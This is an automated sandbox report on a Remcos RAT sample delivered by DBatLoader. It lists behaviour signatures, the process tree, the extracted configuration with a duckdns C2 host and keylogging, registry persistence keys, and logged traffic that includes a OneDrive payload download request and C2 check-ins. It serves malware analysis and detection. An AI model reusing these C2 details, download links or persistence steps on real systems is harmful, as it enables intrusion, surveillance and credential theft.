Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fu56fbrtn8.exe

Overview

General Information

Sample name:fu56fbrtn8.exe
renamed because original name is a hash value
Original sample name:da7c2473b5c455f25f420827af596286.exe
Analysis ID:1430790
MD5:da7c2473b5c455f25f420827af596286
SHA1:101b5f991a26fc9213c4445bd9bfdb87a6a6c5cb
SHA256:e1cecfcc4eed2f4b74af7d971dcf24555534db164ddb0b7cd1e821b2f0402703
Tags:32exetrojan
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Uses dynamic DNS services
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fu56fbrtn8.exe (PID: 5592 cmdline: "C:\Users\user\Desktop\fu56fbrtn8.exe" MD5: DA7C2473B5C455F25F420827AF596286)
    • cmd.exe (PID: 4912 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 756 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • remcos.exe (PID: 908 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • remcos.exe (PID: 2508 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 2916 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 3272 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 1996 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 332 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd" MD5: DA7C2473B5C455F25F420827AF596286)
      • remcos.exe (PID: 3064 cmdline: C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc" MD5: DA7C2473B5C455F25F420827AF596286)
  • Cmzcxhwn.PIF (PID: 5652 cmdline: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 4424 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 6012 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • Cmzcxhwn.PIF (PID: 2700 cmdline: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" MD5: DA7C2473B5C455F25F420827AF596286)
  • remcos.exe (PID: 4692 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: DA7C2473B5C455F25F420827AF596286)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "duckdns.org:1144:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VLI916", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\fgdghrd\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\Public\Libraries\CmzcxhwnO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
    • 0x2:$s1: &@cls&@set
    • 0x5b:$s2: :~41,1%%
    • 0x67:$s2: :~47,1%%
    • 0x73:$s2: :~6,1%%
    • 0x7e:$s2: :~53,1%%
    • 0x8a:$s2: :~1,1%
    • 0x9b:$s2: :~10,1%%
    • 0xa7:$s2: :~39,1%%
    • 0xb3:$s2: :~16,1%%
    • 0xbf:$s2: :~13,1%%
    • 0xcb:$s2: :~25,1%%
    • 0xd7:$s2: :~53,1%%
    • 0xe3:$s2: :~42,1%%
    • 0xef:$s2: :~22,1%%
    • 0xfb:$s2: :~18,1%%
    • 0x107:$s2: :~48,1%%
    • 0x113:$s2: :~51,1%%
    • 0x11f:$s2: :~2,1%%
    • 0x12a:$s2: :~61,1%%
    • 0x136:$s2: :~9,1%%
    • 0x141:$s2: :~19,1%%

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 34 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.fu56fbrtn8.exe.2d1ce08.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                0.2.fu56fbrtn8.exe.2de0000.4.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  0.2.fu56fbrtn8.exe.15680000.10.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    0.2.fu56fbrtn8.exe.15680000.10.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      0.2.fu56fbrtn8.exe.15680000.10.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6c4a8:$a1: Remcos restarted by watchdog!
                      • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                      Click to see the 10 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Cmzcxhwn.PIF, NewProcessName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, OriginalFileName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , ProcessId: 5652, ProcessName: Cmzcxhwn.PIF
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cmzcxhwn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cmzcxhwn
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cmzcxhwn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cmzcxhwn
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Cmzcxhwn.PIF, NewProcessName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, OriginalFileName: C:\Users\Public\Libraries\Cmzcxhwn.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\Public\Libraries\Cmzcxhwn.PIF" , ProcessId: 5652, ProcessName: Cmzcxhwn.PIF
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fu56fbrtn8.exe, ProcessId: 5592, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-VLI916

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: DC AE 48 45 2C 57 CE A4 08 F1 18 84 80 0C CF 00 5D C7 7E 93 00 83 31 D4 8A EA C0 18 7A BD E4 42 89 7C C6 83 FC 64 AA D5 50 54 AA 77 C1 C4 B3 01 71 CC F3 39 82 20 DE 28 94 90 E3 8E C9 E2 BB 9B 41 B9 , EventID: 13, EventType: SetValue, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-VLI916\exepath

                      Snort Signatures

                      Timestamp:04/24/24-07:20:40.804567
                      SID:2032776
                      Source Port:49711
                      Destination Port:1144
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/24/24-07:23:03.835490
                      SID:2032777
                      Source Port:1144
                      Destination Port:49711
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                      Antivirus detection for dropped file
                      Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/AVI.Agent.rqsyc
                      Found malware configuration
                      Source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "duckdns.org:1144:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VLI916", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\ProgramData\Remcos\remcos.exeReversingLabs: Detection: 71%
                      Source: C:\ProgramData\Remcos\remcos.exeVirustotal: Detection: 73%Perma Link
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFReversingLabs: Detection: 71%
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFVirustotal: Detection: 73%Perma Link
                      Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 82%
                      Source: C:\Users\Public\Libraries\netutils.dllVirustotal: Detection: 67%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: fu56fbrtn8.exeReversingLabs: Detection: 71%
                      Source: fu56fbrtn8.exeVirustotal: Detection: 73%Perma Link
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED
                      Machine Learning detection for dropped file
                      Source: C:\ProgramData\Remcos\remcos.exeJoe Sandbox ML: detected
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: fu56fbrtn8.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156B3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_156B3837
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AC3837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_14AC3837
                      Source: fu56fbrtn8.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156874FD _wcslen,CoGetObject,0_2_156874FD

                      Compliance

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeUnpacked PE file: 0.2.fu56fbrtn8.exe.15680000.10.unpack
                      Source: fu56fbrtn8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49725 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                      Source: Binary string: easinvoker.pdbH source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.0.dr
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15689665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689665
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_1568C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15689253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_15689253
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1569C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_1569C291
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_1568BD37
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_156CE879 FindFirstFileExA,0_2_156CE879
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568783C FindFirstFileW,FindNextFileW,0_2_1568783C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_1568880C
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_1568BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_1568BB30
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15699AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_15699AF5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DE58CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02DE58CC
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_33A510F1
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: 6_2_33A56580 FindFirstFileExA,6_2_33A56580
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14ADE879 FindFirstFileExA,8_2_14ADE879
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A99665 FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_14A99665
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9783C FindFirstFileW,FindNextFileW,8_2_14A9783C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9880C FindFirstFileW,FindNextFileW,FindClose,8_2_14A9880C
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AAC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_14AAC291
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14AA9AF5 FindFirstFileW,8_2_14AA9AF5
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_14A9BB30
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: 8_2_14A9C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_14A9C34D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_15687C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_15687C97

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.8:49711 -> 103.186.117.142:1144
                      Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 103.186.117.142:1144 -> 192.168.2.8:49711
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: duckdns.org
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: oceansss.duckdns.org
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: 0_2_02DFC8AC InternetCheckConnectionA,0_2_02DFC8AC
                      Source: global trafficTCP traffic: 192.168.2.8:49711 -> 103.186.117.142:1144
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 13.107.139.11 13.107.139.11
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
                      Source: global trafficHTTP traffic detected: GET /download?resid=FDB0512DE793B32E%21192&authkey=!AAbMANNKbvJdxgc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
